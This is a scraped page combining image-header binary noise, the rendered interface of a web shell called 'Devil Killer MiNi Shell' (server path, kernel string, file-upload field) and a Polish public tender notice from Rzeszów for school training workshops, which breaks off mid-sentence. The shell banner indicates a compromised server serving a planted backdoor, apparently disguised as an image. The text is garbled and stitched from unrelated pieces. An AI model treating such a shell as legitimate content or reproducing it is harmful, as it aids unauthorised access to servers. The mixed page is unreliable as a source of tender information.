JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250317/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250317/0014880101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Podniesienie jakości edukacji w I Liceum Ogólnokształcącym im. ks. St. Konarskiego w Rzeszowie poprzez wdrożenie kompleksowego programu rozwojowego szkoły </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Rzeszów - Urząd Miasta Rzeszowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000650614</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-064</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@erzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.erzeszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Postępowanie prowadzi Urząd Miasta Rzeszowa w imieniu i na rzecz Zamawiającego - I Liceum Ogólnokształcącego im. ks. Stanisława Konarskiego w Rzeszowie</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 0006501614</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">35-064</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">przetargi@erzeszow.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://bip.erzeszow.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Podniesienie jakości edukacji w I Liceum Ogólnokształcącym im. ks. St. Konarskiego w Rzeszowie poprzez wdrożenie kompleksowego programu rozwojowego szkoły </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0af974b9-2ad7-4c49-9600-67a95c4d9469</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00148801</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00074069/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa polegająca na podniesieniu jakości edukacji w I LO w Rzeszowie poprzez wdrożenie kompleksowego programu polegającego na realizacji pakietu szkoleń i warsztatów z podziałem na części:</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;Wydobyć sukces - innowacyjne liceum przyszłości&#34; współfinansowany ze środków w ramach programu Fundusze Europejskie dla Podkarpacia 2021-2027. Numer identyfikacyjny projektu/programu nr projektu: FEPK.07.12-IP.01-0033/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0af974b9-2ad7-4c49-9600-67a95c4d9469 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia.<br/>3. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.<br/>4. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>postępowania.<br/>5. Sposób sporządzenia i przekazywania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (zw. dalej Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych);<br/>6. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach Rozporządzenie Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (zw. dalej rozporządzeniem w sprawie Krajowych Ram Interoperacyjności) , z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>7. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1) w formatach danych określonych w przepisach rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>2) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>8. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. W szczególnie<br/>uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@erzeszow.pl (nie dotyczy składania ofert)).<br/>9. W przypadku załączników, które są zgodnie z Pzp lub Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby,<br/>podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>c.d. w sekcji IX ogłoszenia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-D.271.21.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Moduł 1: Kompetencje społeczne i społeczno–emocjonalne jako fundament efektywnego uczenia się – edycja wiosna 2025 i edycja jesień 2025/wiosna 2026 <br/>1.1. Usługa realizowana jest w jednostce miary – godzina dydaktyczna (45 minut).<br/>1.2. Uczestnikami zajęć są uczniowie klas pierwszych LO w ilości 4 klas (edycja wiosna 2025) i 5 klas (edycja jesień 2025/wiosna 2026).<br/>1.3. Szkolenie ma na celu wszechstronny rozwój kompetencji społecznych i emocjonalnych uczniów klas 1 Liceum. Dzięki któremu uczniowie będą lepiej przygotowani do efektywnego uczenia się, radzenia sobie z wyzwaniami szkolnymi i życiowymi. Warsztaty obejmują zagadnienia:<br/>1)	Motywacja i pewność siebie.<br/>2)	Samodzielność i zarządzenie pracą własną.<br/>3)	Logiczne, analityczne i krytyczne myślenie.<br/>4)	Kreatywność i predyspozycje.<br/>5)	Emocje i stres.<br/>6)	Relacje of-line i on-line bez przemocy.<br/>1.4. Oczekiwane efekty po przeprowadzeniu warsztatów:<br/>1)	Motywacja i pewność siebie:<br/>a.	Zwiększenie motywacji do nauki: Uczniowie będą lepiej rozumieć znaczenie edukacji i czerpać większą satysfakcję z procesu uczenia się.<br/>b.	Pewność siebie w działaniach szkolnych i pozaszkolnych: Uczniowie zyskają pewność w swoich umiejętnościach, co przełoży się na aktywniejszy udział w lekcjach i pozaszkolnych projektach.<br/>2)	Samodzielność i zarządzanie pracą własną:<br/>a.	Rozwinięcie umiejętności planowania i organizacji pracy: Uczniowie będą potrafili efektywnie zarządzać czasem i zadaniami, co pozwoli im na lepsze osiąganie celów edukacyjnych.<br/>b.	Zwiększenie odpowiedzialności za własne działania: Uczniowie będą świadomi konieczności samodzielnej pracy i odpowiedzialności za swoje wyniki.<br/>3)	Logiczne, analityczne i krytyczne myślenie:<br/>a.	Rozwinięcie umiejętności analizy i oceny informacji: Uczniowie będą potrafili krytycznie podchodzić do źródeł informacji i formułować wnioski na podstawie rzetelnych danych.<br/>b.	Umiejętność rozwiązywania problemów: Uczniowie będą lepiej radzić sobie z rozwiązywaniem złożonych problemów i wyzwań edukacyjnych.<br/>4)	Kreatywność i predyspozycje:<br/>a.	Stymulowanie kreatywności: Uczniowie będą zachęcani do myślenia poza schematami i wykorzystywania swojej wyobraźni w procesie nauki.<br/>b.	Rozpoznawanie i rozwijanie własnych predyspozycji: Uczniowie będą lepiej rozumieć swoje mocne strony i jak je efektywnie wykorzystywać w nauce.<br/>5)	Emocje i stres:<br/>a.	Rozwijanie umiejętności radzenia sobie ze stresem: Uczniowie będą potrafili identyfikować źródła stresu i stosować techniki radzenia sobie z nim.<br/>b.	Zwiększenie świadomości emocjonalnej: Uczniowie będą lepiej rozumieć swoje emocje i jak wpływają one na ich zachowanie oraz proces uczenia się.<br/>6)	Relacje offline i online bez przemocy:<br/>a.	Zwiększenie świadomości zagrożeń online i cyberbezpieczeństwa: Uczniowie będą świadomi zagrożeń w sieci i nauczą się, jak chronić swoje dane osobowe oraz jak reagować na cyberprzemoc.<br/>b.	Zapobieganie przemocy i budowanie kultury szacunku: Uczniowie będą lepiej rozumieć, jak unikać i reagować na przemoc, zarówno offline, jak i online, promując kulturę wzajemnego szacunku i zrozumienia.<br/>1.5. Forma przeprowadzonych usługi – zajęcia warsztatowe.<br/>1.6. Czas trwania zajęć dla jednej klasy 18 godzin dydaktycznych.<br/>1.7. Łączna liczba godzin w edycji wiosna 2025 – 18 godzin dydaktycznych x 4 klasy = 72 godziny dydaktyczne.<br/>1.8. Łączna liczba godzin w edycji jesień 2025/wiosna 2026 – 18 godzin dydaktycznych x 5 klas = 90 godzin dydaktycznych.<br/>1.9. Realizacja zadania od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 26.06.2026 r. z tym, że:<br/>a)	Edycja wiosna 2025 od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 27.06.2025 r. <br/>b)	Edycja jesień 2025/wiosna 2026 od dnia 01.09.2025 r. do dnia 26.06.2026 r. <br/>1.10. Zakres usługi 162 godziny dydaktyczne zajęć w dwóch edycjach. 72 godziny dydaktyczne - edycja wiosna 2025 i 90 godzin dydaktycznych- edycja jesień 2025/wiosna 2026.<br/><br/>2. Moduł 2: Kompetencje w zakresie uczenia się – edycja wiosna 2025 i edycja jesień 2025/wiosna 2026<br/>2.1. Usługa realizowana jest w jednostce miary – godzina dydaktyczna (45 minut).<br/>2.2. Uczestnikami zajęć są uczniowie klas pierwszych LO w ilości 4 klas (edycja wiosna 2025) i 5 klas (edycja jesień 2025/wiosna 2026).<br/>2.3. Warsztaty obejmują następujące zagadnienia kształcące kompetencje kluczowe niezbędne w procesie uczenia się oraz na rynku pracy przy użyciu technik, narzędzi i metod gwarantujących szybkie efekty:<br/>1)	Zasady organizacji czasu i planowania nauki.<br/>2)	Jak skutecznie aktywować obie półkule – ćwiczenia.<br/>3)	Eliminacja błędów i złych nawyków czytelniczych.<br/>4)	Efektywna nauka, techniki pamięciowe, mnemotechniki.<br/>5)	Trening koncentracji uwagi wraz z ćwiczeniami.<br/>6)	Praktyczne wykorzystanie nowych umiejętności, m.in sztuka notowania (mapy mentalne).<br/>2.4. Forma przeprowadzonych usługi – zajęcia warsztatowe.<br/>2.5. Czas trwania zajęć dla jednej klasy 18 godzin dydaktycznych.<br/>2.6. Łączna liczba godzin w edycji wiosna 2025 – 18 godzin dydaktycznych x 4 klasy = 72 godziny dydaktyczne.<br/>2.7. Łączna liczba godzin w edycji jesień 2025/wiosna 2026 – 18 godzin dydaktycznych x 5 klas = 90 godzin dydaktycznych.<br/>2.8. Realizacja zadania od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 26.06.2026 r. z tym, że:<br/>a)	Edycja wiosna 2025 od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 27.06.2025 r.<br/>b)	Edycja jesień 2025/wiosna 2026 od dnia 01.09.2025 r. do dnia 26.06.2026 r.<br/>2.9. Zakres usługi 162 godziny dydaktyczne zajęć w dwóch edycjach. 72 godziny dydaktyczne – edycja wiosna 2025 i 90 godzin dydaktycznych – edycja jesień 2025/wiosna 2026.<br/><br/>3. Szczegółowy opis przedmiotu zamówienia określa:<br/> 1) Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) wraz z załącznikiem <br/>2) projektowane postanowienia umowy w sprawie zamówienia publicznego<br/>- stanowiące załączniki dla SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80310000-0 - Usługi edukacji młodzieży</p> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kluczowego personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny zatrudnieniowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Moduł 1: Kompetencje kluczowe jako fundament efektywnego nauczania<br/>1.1. Usługa realizowana jest w jednostce miary – godzina dydaktyczna (45 minut).<br/>1.2. Uczestnikami zajęć jest łącznie 56 nauczycieli w podziale na 7 grup po 8 osób w grupie .<br/>1.3. Usługa realizowana będzie w formie warsztatów szkoleniowych / seminariów dyskusyjnych w formule hybrydowej tj. 50% wsparcia będzie realizowane w formie stacjonarnej a drugie 50% w formie zdalnej. Zamawiający udostępni dla zajęć zdalnych aplikację Microsoft Teams oraz sprzęt komputerowy. <br/>1.4. Szkolenie składa się z 4 modułów:<br/>1)	Celem zamówienia jest aktualizacja wiedzy z zakresu konstruowania programów nauczania i praktycznego wykorzystania najnowszych trendów w tej dziedzinie:<br/>a)	umiejętność korzystania z mediów,<br/>b)	gamifikacja,<br/>c)	uczenie adaptacyjne,<br/>d)	mikrouczenia,<br/>e)	VR.<br/>Czas realizacji modułu – 12 godz.<br/>2)	Poznanie oraz wdrożenie innowacyjnych metod nauczania wspierających proces nabywania kompetencji kluczowych. Do wyboru 5 spośród wybranych przez Zamawiającego:<br/>a)	tekst argumentacyjny, <br/>b)	mapy mentalne, <br/>c)	metaplan,<br/>d)	drzewko decyzyjne,<br/>e)	WebQuest,<br/>f)	projekt edukacyjny, <br/>g)	drama, <br/>h)	debata, <br/>i)	portfolio z wykorzystaniem technologii cyfrowych z zachowaniem zasad cyberbezpieczeństwa)<br/>Czas realizacji modułu – 16 godz.<br/>3)	Mnemotechniki i ich zastosowanie w procesie nauczania oraz pracy własnej - poznanie najskuteczniejszych mnemotechnik i ich praktyczne zastosowanie, umiejętność doboru narzędzia do poszczególnych zespołów klasowych, a także wykorzystanie w pracy własnej z uwzględnieniem specyfiki przedmiotu.<br/>Czas realizacji modułu – 16 godz.<br/>4)	Tutoring i mentoring w kształtowaniu kompetencji kluczowych – tutor opiekun i doradca.<br/>Czas realizacji modułu – 16 godz.<br/>1.5. Forma przeprowadzonych usług – zajęcia warsztatowe stacjonarne i zdalne – forma hybrydowa.<br/>1.6. Czas trwania zajęć dla jednej grupy – 8 dni w przedziale od 6 do 8 godzin dydaktycznych jednakże nie więcej niż 60 godzin dydaktycznych łącznie. Przewiduje się zajęcia dla jednej grupy w podziale na lata 